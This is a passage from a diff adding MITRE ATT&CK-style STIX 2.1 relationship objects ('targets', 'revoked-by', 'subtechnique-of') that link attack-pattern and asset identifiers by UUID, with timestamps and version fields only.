"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--a127c32c-cbb0-4f9d-be07-881a792408ec", + "target_ref": "attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8d75dd07-0207-49e9-b7b1-a68a5f106376", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8d7957af-a314-4e12-bde6-6148e234ff58", + "created": "2020-02-11T19:09:48.749Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0", + "target_ref": "attack-pattern--650c784b-7504-4df7-ab2c-4ea882384d1e", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8d7e2aa5-129a-4060-88ae-9fc066af13c7", + "created": "2023-09-28T21:25:20.417Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:25:20.417Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8d8c3e6a-c700-470f-bc50-181214019197", + "created": "2024-06-21T14:12:20.277Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.277Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--eb897572-8979-4242-a089-56f294f4c91d", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8d946943-8d77-413b-a686-7b735b56961e", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8da0b4b9-e2f6-4da9-ae3c-0bacc3596695", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8dbc7dff-0fb5-474a-84df-594a5667ea85", + "created": "2024-06-21T14:12:20.272Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8dda1296-0835-4748-92a3-24b34eb8a084", + "created": "2021-08-04T20:54:03.286Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--11f29a39-0942-4d62-92b6-fe236cf3066e", + "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8ddcfc36-a2e8-4f58-84fb-0e2c0f103fa0", + "created": "2024-06-27T09:41:48.823Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:41:48.823Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8df35dec-f73f-40f5-a0b5-2d8b008662c4", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8df70aec-5237-4534-9439-e701dfca5cce", + "created": "2022-07-08T12:46:15.543Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-07-08T12:46:15.543Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--df1bc34d-1634-4c93-b89e-8120994fce77", + "target_ref": "attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8dfa86a7-1b39-4457-bd41-c1ff62685711", + "created": "2020-01-24T18:50:29.218Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--6e6845c2-347a-4a6f-a2d1-b74a18ebd352", + "target_ref": "attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8dfe3d53-5a06-47c5-a752-de0b712741ec", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8e11dbe7-207a-4912-b63e-2ea0cfcc461b", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5e4a2073-9643-44cb-a0b5-e7f4048446c7", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8e1cab5a-7a82-4116-8727-d77200f52419", + "created": "2020-01-24T14:14:05.642Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--01df3350-ce05-4bdf-bdf8-0a919a66d4a8", + "target_ref": "attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8e36ab79-8ef7-4d01-b76d-f560e46368da", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--38eb0c22-6caf-46ce-8869-5964bd735858", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8e378dcc-ca88-4742-93cf-00565d8b8130", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8e4b0048-b07f-4833-9e20-85989e2fff23", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8e8e2383-199a-4bb1-abc0-b2d6539b2992", + "created": "2024-06-21T14:12:20.266Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.266Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--215d9700-5881-48b8-8265-6449dbb7195d", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8ebf48fa-0016-41ab-9fed-d44c7b9eb12d", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8ed7e323-578c-4a62-bf32-0bf2fefa872b", + "created": "2023-09-29T17:05:44.653Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:05:44.653Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8eeb592e-7066-4859-8fc5-e11cbe87ff24", + "created": "2024-06-27T09:36:59.681Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:36:59.681Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--866d0d6d-02c6-42bd-aa2f-02907fdc0969", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8eec209f-e84b-4859-9eb1-7ad0300e8943", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2bce5b30-7014-4a5d-ade7-12913fe6ac36", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8eec2a5a-aaa8-41d7-9a40-f5f9d18030a9", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8ef724a1-43ae-422c-8993-9d989f889c6d", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c8e87b83-edbb-48d4-9295-4974897525b7", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8f2149f4-896c-4c88-8381-6bbbad6f790a", + "created": "2024-06-27T09:28:20.944Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:28:20.944Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8f27ebdf-5c97-44bb-8fcb-404233297446", + "created": "2024-06-26T14:39:35.720Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:39:35.720Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4fd8a28b-4b3a-4cd6-a8cf-85ba5f824a7f", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8f3ea79e-b4dc-4bc6-8f82-28f68113d0fe", + "created": "2024-05-21T16:32:23.972Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-21T16:32:23.972Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8f5086fd-1cae-4f43-8a23-e47ace0620db", + "created": "2020-03-10T18:34:39.967Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--f44731de-ea9f-406d-9b83-30ecbb9b4392", + "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8f553453-4aad-48c6-a3a4-e567942bfdb5", + "created": "2024-07-02T13:55:55.747Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.747Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8f561a5b-076e-4a39-aab4-f66a99ed49df", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8f748caa-dd1e-41aa-b09a-333ce8916bd0", + "created": "2020-02-05T14:28:17.039Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8f82d6f9-59d6-47ee-be24-202f934694e2", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8f85e967-5bc2-4be8-bab9-e52d399a652e", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8f90dc7c-6306-418f-85b0-0ac8eedee0d5", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8f947e00-2579-4120-a8b0-d466e59fac1a", + "created": "2023-09-28T19:49:25.824Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:49:25.824Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8f95c258-e974-44e1-88ea-d5f690faa9dc", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d511a6f6-4a33-41d5-bc95-c343875d1377", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8fd48ef3-80bf-4697-8880-8870b5e52037", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + 